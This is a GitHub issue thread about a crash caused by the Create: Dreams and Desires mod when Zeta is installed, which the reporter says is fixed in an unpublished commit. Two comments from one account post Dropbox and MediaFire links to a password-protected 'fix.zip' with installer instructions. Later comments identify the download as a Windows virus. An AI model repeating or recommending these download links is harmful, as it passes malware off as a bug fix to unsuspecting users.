### ISSUE TITLE
Create: Dreams and Desires causes a crash if the Zeta mod is installed.

### ISSUE THREAD

**Issue by ProjectHSI** [LopyLuna/Create-Flavored#95]
Create: Dreams and Desires causes a crash, as mentioned earlier. This happens since Zeta crawls through all registered recipes.

1. Zeta begins crawling through recipes
2. a call is made to GRHoeItem.getCraftingRemainingItem
3. ItemStack's constructor reports an error of "Cannot invoke "net.minecraft.world.level.ItemLike.m_5456_()" because "p_41604_" is null" (accordings to [mappings.dev](mappings.dev), this crashes on the "AsItem()" function)
4. The exception travels up the callstack, causing a crash, as Zeta didn't catch the exception.

**Comment by ProjectHSI** [comment]
Nevermind, this was fixed in https://github.com/LopyLuna/Create-Dreams-and-Desires/commit/8a0c592623fb0ab7b28b374301fded1e72720df9 and just hasn't been published to Modrinth.

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ProjectHSI** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

thy shall be banished for submitting virus

**Comment by LopyLuna** [comment]
do not upload downloads of my mod without permission

**Comment by ProjectHSI** [comment]
> do not upload downloads of my mod without permission

unsure what you mean by this? the files were a windows virus, not your mod from the latest commit on there

how do i know this, you may ask? i downloaded it to find out (cautiously, of course)

**Comment by LopyLuna** [comment]
rather be safe and judging by the context I think they did but if not and advertising that it is this mod I'd assume they put a virus in some form 

ask permission first before uploading in general of the software and even the place where your uploading the software at

software as in mod, program, etc that involves with coding it

**Comment by LopyLuna** [comment]
sorry if I horribly explain it but it was for a good intention

**Comment by LopyLuna** [comment]
and due to the recent event with areo I'm bit more cautious too

**Comment by ProjectHSI** [comment]
> rather be safe and judging by the context I think they did but if not and advertising that it is this mod I'd assume they put a virus in some form
> 
> ask permission first before uploading in general of the software and even the place where your uploading the software at
> 
> software as in mod, program, etc that involves with coding it

ok
